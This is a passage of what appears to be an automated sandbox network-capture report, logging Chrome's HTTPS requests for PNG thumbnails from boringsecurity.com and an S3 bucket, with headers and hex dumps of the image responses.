                                                                          Data Ascii: PNGIHDRMpHYs IDATx\QA@AADB))ETP$Z]U[r9fptuv}Vw;Cn?m_T>o^/4//v?vN>2yFb\`lmW+*e.,B(yA_\
                                                                          2023-12-10 16:45:01 UTC6952INData Raw: 81 6b 8a ea 90 d5 51 09 ea 51 c9 b4 8c e8 92 7c 8f 58 35 a9 82 56 e9 99 92 5a 25 1d d8 d0 d3 9e fd e8 65 41 c3 eb 1f 35 6a fd 59 80 93 f6 d7 b0 12 f0 e1 ed 1e f8 b5 a2 80 3f 25 c8 ad 76 33 83 d1 70 bf 65 3b a8 42 a5 d2 35 25 6f b5 8c 10 30 72 50 45 0b 72 95 d5 89 40 c7 94 82 f0 35 d8 3e 07 eb 83 14 34 f8 bc 5a db 18 ea b5 8d 81 a3 63 82 26 92 34 e8 98 12 a1 8e 29 80 9e 19 a9 51 d3 23 1b e5 14 a0 46 cf 8c f0 74 4d 01 ff ad 06 9d 46 7f 8e ad 63 02 75 da c6 f8 f3 54 ed ea f5 4c e1 b6 bc ba a0 78 e3 98 7a 4c a5 fc 90 2a f7 33 01 27 51 b6 ea 0f 25 70 fe f6 26 7e 7a 17 53 f6 41 06 43 f4 40 b6 23 bc d1 36 22 d5 3a 26 8d fe 97 76 a3 92 cd 56 50 86 72 4d 43 a8 91 82 ea 4f b0 7d 66 26 f1 39 42 82 be 17 c2 83 3f fb 52 cb 10 1e 68 e8 c3 29 55 1d d8 af a2 05 85 ca 1a
                                                                          Data Ascii: kQQ|X5VZ%eA5jY?%v3pe;B5%o0rPEr@5>4Zc&4)Q#FtMFcuTLxzL*3'Q%p&~zSAC@#6":&vVPrMCO}f&9B?Rh)U
                                                                          2023-12-10 16:45:01 UTC9000INData Raw: 89 2f 49 8d 34 9b 54 29 e8 f0 1d 58 55 55 02 fb f6 cf 63 f7 ed 65 da 80 d1 e3 d4 38 77 32 31 ca 85 44 0c e8 01 77 8f ad 47 3f 8d 2a 8f 04 34 1a f9 5d dc 0a d5 77 0a c9 e2 29 31 90 bf 7a 02 61 3e dc 43 50 e9 50 a5 1a 53 11 e8 87 ed 22 73 d2 02 49 64 5f 5b 98 39 c2 f3 13 85 43 e0 fa f5 32 11 c5 0e f1 16 a1 99 c6 d4 45 e5 95 5c f2 fb d9 2d a4 67 57 33 30 31 d2 6f 88 89 4d 6c 98 36 7d 8e 60 e1 fc 05 30 23 63 1a 4c 18 3b 46 38 7a d4 48 8e a1 81 3e fa 87 20 b5 88 8d 9d 3d b9 7e e3 36 79 f0 f0 b1 30 72 90 9b 68 5d 46 38 2a 25 60 e4 5b 71 39 17 06 fb 77 87 51 43 ba 83 8b b3 33 7f f5 ba 2d fc 88 c8 18 30 32 b5 00 a7 9e ae 64 47 7e 91 e8 dc f9 4b a4 57 0f 07 92 b5 70 24 f1 75 eb ca 7a 74 72 13 55 34 f1 df d3 14 ed a2 af 89 69 95 dc cc 71 e8 bb 11 34 d9 f8 fb 4f 49
                                                                          Data Ascii: /I4T)XUUce8w21DwG?*4]w)1za>CPPS"sId_[9C2E\-gW301oMl6}`0#cL;F8zH> =~6y0rh]F8*%`[q9wQC3-02dG~KWp$uztrU4iq4OI
                                                                          2023-12-10 16:45:01 UTC5414INData Raw: f7 ef 6d e6 58 58 18 f2 14 3b 29 36 8c 0c 75 e6 88 e7 c1 fd db b0 7d 69 42 a6 d4 39 5c 42 4d 95 4e 75 66 e6 06 dc 8d 1b 47 33 df bf 2f 16 62 7b bb f4 58 ad 9f 1a ba 8a 7f a0 49 fd 12 6c f7 ee 65 71 bb 75 b3 60 ab a8 6a 82 a9 a1 16 2f 23 de 43 d0 a8 4e 5f 3d 14 e4 df 86 6e b2 78 b7 be 6b 57 43 66 fb 8e 8a a0 a4 d4 59 14 10 d0 ab fe f1 e3 ad 3c dc 47 21 3d b1 b2 e2 07 bf c6 cd c0 fd 0b d8 1e 3c d8 c2 eb da d5 9c 63 6e 6e 09 a6 66 e6 60 ac a3 54 27 3e 41 f0 df f6 e1 fe 0a 3a 6c 77 4a 0d 73 65 7b 79 7b 73 b5 b4 34 c1 c0 c0 04 9c 9d 6d 98 0f 1f 66 d3 8a 80 a4 8d a8 e2 47 8b 2e 9b 81 fb 7b ca 76 ff fe 16 9e a3 a3 15 d7 c4 c4 02 dc dc 5c 89 a6 96 0e 68 ab 76 64 ce 4e f2 12 e1 2c b8 46 73 d8 74 06 c3 7f 68 56 b1 1c e6 01 e9 61 dd 45 39 59 eb 58 c9 29 a9 a0 af af
                                                                          Data Ascii: mXX;)6u}iB9\BMNufG3/b{XIlequ`j/#CN_=nxkWCfY<G!=<cnnf`T'>A:lwJse{y{s4mfG.{v\hvdN,FsthVaE9YX)


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          179192.168.2.5499113.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC636OUTGET /thumbnail_Freeky_Crypto_29a0bbd006.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 5a 7a 48 47 73 4a 69 62 4b 4e 51 63 70 56 6f 42 66 71 4c 63 6e 7a 6f 6a 52 67 51 45 45 2b 7a 6a 61 4c 30 56 71 4a 63 56 72 78 54 38 53 49 2f 58 77 7a 53 47 72 73 62 63 36 35 72 69 63 76 42 43 45 30 70 34 30 2f 79 2b 51 63 71 39 41 72 56 56 54 50 38 72 46 6d 6c 32 6f 45 5a 79 59 72 54 41 6a 75 4b 42 33 77 51 70 62 43 63 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 32 46 51 30 58 32 45 54 30 56 41 31 31 4b 4a 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 30 35 20 4a 61 6e 20 32 30 32 33 20 30 39 3a 32 31 3a 34 31 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: ZzHGsJibKNQcpVoBfqLcnzojRgQEE+zjaL0VqJcVrxT8SI/XwzSGrsbc65ricvBCE0p40/y+Qcq9ArVVTP8rFml2oEZyYrTAjuKB3wQpbCc=x-amz-request-id: 82FQ0X2ET0VA11KJDate: Sun, 10 Dec 2023 16:45:02 GMTLast-Modified: Thu, 05 Jan 2023 09:21:41 GM
                                                                          2023-12-10 16:45:01 UTC1510INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 05 58 94 59 fb ff c7 95 b0 31 90 b2 b0 bb 5d bb 03 11 13 a5 44 44 40 04 29 09 91 06 01 45 54 50 51 31 51 a4 c1 c2 6e 5d bb db 55 b7 74 75 cd 35 56 62 82 09 e6 7c ff d7 7d 86 c1 d1 75 df f8 bd ef fb 17 5d bc ae 73 3d 83 33 3c cc 3c cf 67 be 77 9e 73 04 41 e9 db aa 1e 05 04 c9 07 72 ab 67 3c 7e 3d 2f f3 c9 bb db 19 cf 8a 4a 33 9e 15 29 2a 47 e5 35 c8 f8 0f ae 41 e6 93 82 3b c4 d4 aa 63 bb ab 1f 01 04 a1 b9 bb ab 0a 08 b6 b5 f7 7e 6a 96 fe b4 e0 56 c6 73 21 d2 9f 8b 68 b0 b2 63 e5 a8 bc 06 f8 4f ae 41 06 1d 9f 16 dc 5c 73 ef c7 66 07 95 10 08 56 1f d9 53 3d fd 69
                                                                          Data Ascii: PNGIHDRMpHYs IDATxXY1]DD@)ETPQ1Qn]Utu5Vb|}u]s=3<<gwsArg<~=/J3)*G5A;c~jVs!hcOA\sfVS=i
                                                                          2023-12-10 16:45:01 UTC15952INData Raw: f6 6d 11 7e be 77 97 45 cc 8f 96 3a 44 2d 12 26 dd f9 4d 46 91 2e 4f b9 7c 2d 6a f7 35 02 f7 67 13 5a c4 23 ce 85 27 af 49 cc 6c ec 45 6e 2e ce 6c f5 aa 55 58 bb 6e 3d 5b b5 6a 15 4b 4e 4e 66 eb d7 af 47 4a 4a 8a 1a 38 64 64 64 22 3b 5b 05 dc b6 6d db b1 73 a7 0a b8 bd 7b f7 96 03 77 f4 e8 d1 72 e0 4e 9f 3e 4d 26 14 a7 4e 9d c6 fc a8 20 04 78 8c c7 da c4 99 38 b8 23 12 c7 f6 c6 41 26 39 03 e0 37 fc f6 60 1b f2 b7 c6 e0 f6 ad 54 a4 6d 9a 8b 4d 6b bd 99 ec f5 16 1c de ea cb a2 42 5c d8 81 43 47 41 ff 2e 9f 3b cb 66 f9 fa 8b bd 53 b7 8a 73 0b a0 cc fe bd 44 ad 76 f8 a2 7d bb af 0d b8 0f 60 23 e7 fb 99 90 f2 62 cc 63 5d ba c8 6c 8c 45 49 74 64 04 92 d7 ac c1 b2 e5 cb d9 8a 15 2b b0 7a f5 6a ac 59 b3 86 03 b7 31 65 23 08 b8 2d 1c b8 0c 0e 1c 99 d4 6d db b6 71
                                                                          Data Ascii: m~wE:D-&MF.O|-j5gZ#'IlEn.lUXn=[jKNNfGJJ8ddd";[ms{wrN>M&N x8#A&97`TmMkB\CGA.;fSsDv}`#bc]lEItd+zjY1e#-mq
                                                                          2023-12-10 16:45:01 UTC9000INData Raw: 45 a4 f1 e0 d4 7a fe ff f7 8f 24 e1 ee a1 65 fc b5 67 33 83 70 74 bd 07 07 6b 57 a2 3d ca 77 97 5e 36 9d e6 aa b2 a3 6b 67 e2 e8 6a 47 1c 48 b4 45 4a 90 39 e6 3b f5 2b b5 1e d5 59 3a 6c 68 1f b9 e3 2c 7b b1 99 cd 64 d1 88 a1 03 a5 f3 87 b5 2f 3d 36 a3 3f 2e 78 8f c6 45 df b1 b8 e8 3f 1e e7 67 0e 40 9c 8b a5 64 dd e3 22 79 d6 8b ca 8d 41 fe 27 a0 f1 e3 73 55 de 6d cb 93 42 d0 fc 55 5a 7b 63 eb 3b 60 47 11 e4 8e f1 ab 8b 22 2c 05 7c 9d 60 35 70 a4 72 f9 a1 3a d8 11 52 be 6c 3e cb 9b a7 83 e8 a9 da 2c dd 4f 17 e1 d6 55 65 26 f5 ab 88 5c 26 f6 01 a9 0e 6d 1b 4e 66 6f d7 32 07 46 7b d5 ef 4a e4 00 aa c6 12 5b 10 88 bb 12 ec f9 1e f6 7b 96 3b 62 5f d2 0c ec 4b 72 e2 ca 95 9f 60 5f fe ba 1d 4b 6c b9 62 ee 58 62 c7 21 db a7 06 6c 8d 33 f6 25 da 71 c0 a2 9c fa 97
                                                                          Data Ascii: Ez$eg3ptkW=w^6kgjGHEJ9;+Y:lh,{d/=6?.xE?g@d"yA'sUmBUZ{c;`G",|`5pr:Rl>,OUe&\&mNfo2F{J[{;b_Kr`_KlbXb!l3%q
                                                                          2023-12-10 16:45:01 UTC1243INData Raw: ad 22 5e c9 1f a0 47 fe 3b cf 5b 53 c6 81 f1 33 e9 a8 5c fa e7 db 15 e7 58 eb ca 1e 8d 37 b0 52 55 3d 93 19 30 9c f0 6f 81 ce b8 05 11 cd fd 0d 5b b8 aa 46 d2 65 38 09 7d cb 90 ac 7f 39 95 45 01 27 ee 3e 11 a6 ee 49 e0 45 8c 6a 0a 1c 28 28 c5 5d c7 c2 3f 9b fa 55 eb 20 4b f8 00 a6 fc ce 10 b7 77 86 2a 4b ce b4 d5 d1 92 6c ef 78 57 78 c5 4a 98 32 25 9a d6 72 eb c0 83 4b 00 1b ce b4 0c dd d9 02 0e 5c 4b 38 53 60 4a ac c1 57 d8 41 e8 4f c7 9e 3a 33 85 99 54 14 36 6b d7 16 5c aa cb 85 f3 60 c2 0b 47 78 8f ee 90 6a a2 e0 1f 37 00 9f 5d bd 89 3d a5 65 b8 52 a9 c5 a9 47 95 f8 e8 d0 61 6c 38 7b 81 01 53 fa fc f9 28 3a 71 12 df 3f ad 41 c6 bb d3 b0 f9 f0 77 b8 ad 05 c3 84 5b 2f 5f a5 ec 87 b2 7a 60 fe ae dd e0 45 64 c1 27 e1 5d f0 b9 66 50 52 66 6e 64 59 6a da 69
                                                                          Data Ascii: "^G;[S3\X7RU=0o[Fe8}9E'>IEj((]?U Kw*KlxWxJ2%rK\K8S`JWAO:3T6k\`Gxj7]=eRGal8{S(:q?Aw[/_z`Ed']fPRfndYji


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          180192.168.2.54991675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC775OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC418INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 34 36 36 2d 31 4f 45 32 33 52 52 2b 62 4f 7a 37 35 59 76 69 36 61 30 42 52 4d 78
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: "466-1OE23RR+bOz75Yvi6a0BRMx
                                                                          2023-12-10 16:45:01 UTC1133INData Raw: 34 36 36 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 00 a5 50 4c 54 45 3b 6a 81 1d 1d 1d 1b 1a 19 3a 69 80 3a 66 7c 3a 67 7d 20 20 20 37 64 7b 37 67 7a 3a 64 7c 59 54 4d bd a2 7e 22 23 23 3b 6c 84 36 63 79 16 15 14 b4 9c 7a ad 93 70 51 4c 47 28 3d 47 35 65 7e c3 aa 87 cc b1 8c 34 2f 2a 5f 59 51 3d 3c 39 48 44 3e 30 55 67 2c 4a 59 36 5e 71 ed d1 a8 7a 6c 59 98 85 6b 4a 49 45 27 2f 33 3c 47 4b 98 7d 57 d3 b9 94 3d 55 5e dc c1 9b 88 71 51 e4 c9 a1 6e 61 4e a2 8b 6b 4b 29 15 62 53 3f 32 1d 11 aa 97 7d 88 78 61 51 69 74 68 6b 6a a8 84 51 cb cb cb 53 40 29 ae ae ae c0 6b 59 a4 00 00 00 0a 74 52 4e 53 f1 ff ff ff ff ff ff 60 60 60 e1 21 14 3c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00
                                                                          Data Ascii: 466PNGIHDR00`PLTE;j:i:f|:g} 7d{7gz:d|YTM~"##;l6cyzpQLG(=G5e~4/*_YQ=<9HD>0Ug,JY6^qzlYkJIE'/3<GK}W=U^qQnaNkK)bS?2}xaQithkjQS@)kYtRNS```!<pHYs
                                                                          2023-12-10 16:45:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          181192.168.2.54991875.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC536OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC404INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 31 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 35 2d 7a 62 56 76 42 57 57 32
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 1Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 2128Content-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: 35-zbVvBWW2
                                                                          2023-12-10 16:45:01 UTC782INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 03 00 50 4c 54 45 e6 8d 40 df 8a 3f e7 8d 3f ea 8d 3c df 8a 3f de 89 3f e1 8c 40 d4 82 39 e2 88 39 e0 8a 3f e3 8c 3f e3 88 3a e6 8b 3e ed 90 3f dc 81 35 d3 7e 38 6e 00 ab c2 7e 3e 4f 00 89 aa b1 67 c4 c6 c5 58 4e 65 4e 5c 67 9b a1 8e cc 82 3c a6 69 35 de 85 39 20 4c 1c d5 e3 8f 7f 8b 63 5f 6e 79 27 4d 1e 2f 00 57 a1 ab 63 de df d9 a6 a5 a8 67 7b 8a 68 04 9f af ba 6a 6d 73 49 88 94 62 9c a5 5c c0 c4 b3 c2 77 38 94 64 43 16 40 0f b9 71 36 87 65 46 ad af a7 22 3c 15 3c 07 7a bd ca 81 40 4b 57 6f 71 73 05 11 ca 51 3c 41 45 4d 27 8a 98 76 5d 00 f5 77 7e 44 d8 85 3c 88 8b 8e 94 9d 55 ab 9d 54 86 31 6e df 87 3c 9b 6f 35 b4 b3 b4 5e 5e 54 5e 61 76 52 62 6e ff
                                                                          Data Ascii: PNGIHDR00`PLTE@??<??@99??:>?5~8n~>OgXNeN\g<i59 Lc_ny'M/Wcg{hjmsIb\w8dC@q6eF"<<z@KWoqsQ<AEM'v]w~D<UT1n<o5^^T^avRbn
                                                                          2023-12-10 16:45:01 UTC1346INData Raw: 34 35 91 cd b4 be 97 87 d3 a0 7c 86 9d aa 6d f1 4c d3 81 a0 91 d2 3a b3 4e 0c 8c ae 50 fd 3c 00 00 00 09 74 52 4e 53 f2 ff ff ff ff ff ff 65 f8 9a c8 87 fb 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 04 e1 49 44 41 54 78 9c 95 96 75 54 5b 4b 10 c6 b3 c9 b9 e9 d9 dc 48 d3 38 b1 86 18 29 1a 9c e2 ee ee 14 77 77 77 68 0b 35 a8 17 a8 17 5a 28 75 77 77 77 7d ee d2 e7 ee ef bc 13 68 49 80 9b 96 f7 fd 7b f7 77 77 66 67 f6 db c1 4d 43 20 80 53 14 80 c8 34 1c 0e 8f 4c 75 3d 84 08 1e 87 83 ff 63 3d 84 08 c4 4d 39 9e 51 01 1c d4 2f 00 88 c8 a4 ff bd 06 40 20 ea 8e 1f 49 75 4a 00 00 78 83 b9 1f 98 00 08 49 60 2a 00 20 92 62 0f 16 d8 7d ba 8f c2 35 c6 03 f0 46 00 90 9c dc 8f 05 27 7e 66 67 42 40 16 9a 51 48 44 a0 1f 00 08 80 00 3a b5 b7 ef 4f
                                                                          Data Ascii: 45|mL:NP<tRNSepHYsIDATxuT[KH8)wwwh5Z(uwww}hI{wwfgMC S4Lu=c=M9Q/@ IuJxI`* b}5F'~fgB@QHD:O


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          182192.168.2.54991775.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC831OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 34 2d 38 32 31 46 56 34 4f 78 4a 69 59 33 4d 51 6c 32 6b 6d 7a 46 49 46 52 2b 4d
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: 34-821FV4OxJiY3MQl2kmzFIFR+M
                                                                          2023-12-10 16:45:01 UTC1616INData Raw: 36 34 39 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 01 86 50 4c 54 45 e3 e3 a7 db df a4 a5 06 0a a2 8b 6a 58 48 2f ae ab 7c 8b 76 57 72 5a 37 c5 ad 89 cc b3 8f b8 a0 7e e6 e7 a9 6c 5c 3f 61 4d 33 ae 98 78 7c 6a 4f 37 37 34 c5 c3 8f b4 08 0d 9b 80 65 a7 91 72 b9 b5 85 a4 9e 7b 77 64 45 87 83 66 cd ae 82 c7 2e 2e d9 d9 9f 7e 76 54 37 2b 1b 71 60 46 9a 11 12 d1 d0 99 b0 a0 73 ca cd 95 50 40 27 7e 73 5d 64 54 3a c2 8d 68 59 5a 52 80 82 61 48 37 22 e1 ed ad 5c 52 3f 6b 65 4f d0 52 4d bb 3e 3b d6 df a1 97 8a 61 9f 97 6e 90 80 5a 72 6b 5a dd e7 aa 8a 2f 22 b0 65 4f a7 36 30 b3 4c 49 de dc db cf cd ca 8f 71 4b c8 76 5c cc 9f 78 5f 14 0e 88 0e 0c a1 85 56 95 48 40 d7 df 9f 9d 56 40 d1 c8 92 b7 af
                                                                          Data Ascii: 649PNGIHDR00`PLTEjXH/|vWrZ7~l\?aM3x|jO774er{wdEf..~vT7+q`FsP@'~s]dT:hYZRaH7"\R?keORM>;anZrkZ/"eO60LIqKv\x_VH@V@
                                                                          2023-12-10 16:45:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          183192.168.2.54991352.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC431OUTGET /thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_3940_91e199a0b7.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
